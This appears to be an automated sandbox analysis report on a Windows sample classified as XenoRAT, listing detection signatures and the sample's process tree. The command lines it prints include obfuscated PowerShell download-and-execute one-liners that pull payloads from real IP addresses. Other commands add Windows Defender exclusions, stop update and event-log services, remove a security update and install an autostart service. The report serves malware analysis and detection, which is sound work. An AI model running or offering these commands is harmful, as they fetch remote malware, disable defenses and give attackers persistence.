Windows Analysis Report
file.exe
Overview
General Information
| Detection | Score | Range | Whitelisted | Confidence |
|---|---|---|---|---|
| XenoRAT | 100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Powershell download and execute
Yara detected XenoRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Downloads files with wrong headers with respect to MIME Content-Type
Found direct / indirect Syscall (likely to bypass EDR)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file contains section with special chars
Powershell drops PE file
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Uses ipconfig to lookup or modify the Windows network settings
Uses powercfg.exe to modify the power settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
- file.exe (PID: 5680 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 92D4E2EF88E5AAFB72DDDE13E84B549A)
- powershell.exe (PID: 5492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://85.28.47.8/x/L.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 4616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- ipconfig.exe (PID: 992 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
- cmd.exe (PID: 7084 cmdline: "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Public\0x1.log MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- attrib.exe (PID: 4032 cmdline: attrib +h C:\Users\Public\0x1.log MD5: 0E938DD280E83B1596EC6AA48729C2B0)
- ipconfig.exe (PID: 6204 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
- RegSvcs.exe (PID: 5396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- powershell.exe (PID: 6600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://85.28.47.8/x/M.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- ipconfig.exe (PID: 3184 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
- powershell.exe (PID: 2248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\ MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- LB311.exe (PID: 420 cmdline: "C:\Users\user\AppData\Roaming\LB311.exe" MD5: C4BEF67027DB50C7F4F3A64584FED4A7)
- powershell.exe (PID: 3300 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7312 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wusa.exe (PID: 7400 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
- sc.exe (PID: 7320 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 7416 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 7476 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 7528 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 7576 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 7624 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 7632 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 7648 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 7684 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- dialer.exe (PID: 7724 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
- winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
- lsass.exe (PID: 652 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
- svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- dwm.exe (PID: 996 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
- svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- sc.exe (PID: 7800 cmdline: C:\Windows\system32\sc.exe delete "LIB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 7876 cmdline: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 7944 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 7952 cmdline: C:\Windows\system32\sc.exe start "LIB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://85.28.47.8/S.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 5028 cmdline: "C:\Windows\system32\wscript.exe" //E:VBScript C:\Users\Public\0x1.log //Nologo MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 5088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://176.113.115.177/x/5.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 3580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- ipconfig.exe (PID: 2924 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
- RegSvcs.exe (PID: 1708 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- svchost.exe (PID: 2924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- wscript.exe (PID: 1112 cmdline: "C:\Windows\system32\wscript.exe" //E:VBScript C:\Users\Public\0x1.log //Nologo MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 7176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://176.113.115.177/x/5.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- ipconfig.exe (PID: 7976 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
- RegSvcs.exe (PID: 8188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- Mig.exe (PID: 8040 cmdline: C:\ProgramData\Mig\Mig.exe MD5: C4BEF67027DB50C7F4F3A64584FED4A7)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
Change of critical system settings

| Source | Author |
|---|---|
| | Joe Security |

System Summary

| Source | Author |
|---|---|
| | Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing |
| | Florian Roth (Nextron Systems) |
| | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| | Florian Roth (Nextron Systems) |
| | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| | frack113, Nasreddine Bencherchali (Nextron Systems) |
| | Florian Roth (Nextron Systems) |
| | Florian Roth (Nextron Systems) |
| | Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community |
| | Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |

HIPS / PFW / Operating System Protection Evasion

| Source | Author |
|---|---|
| | Joe Security |
No Snort rule has matched
AV Detection

| Source | Type | Value |
|---|---|---|
| | Avira URL Cloud | |
| | Avira URL Cloud | |
| | Virustotal | Perma Link |
| | Integrated Neural Analysis Model | |
| | Joe Sandbox ML | |
| | Joe Sandbox ML | |
| | Joe Sandbox ML | |
| | Static PE information | |
| | HTTPS traffic detected | |
| | HTTPS traffic detected | |
| | HTTPS traffic detected | |
| | HTTPS traffic detected | |
| | Binary string | |
| | Binary string | |
| | Code function | 55_2_000002D0165EDCE0 |
| | Code function | 58_2_000002D6F151DCE0 |
| | Code function | 66_2_0000014E41FDDCE0 |
| | Code function | 67_2_000001D15B05DCE0 |
| | Code function | 68_2_0000023AF32EDCE0 |

Software Vulnerabilities

| Source | Type | Value |
|---|---|---|
| | Child | |

Networking

| Source | Type | Value |
|---|---|---|
| | Image file has PE prefix | |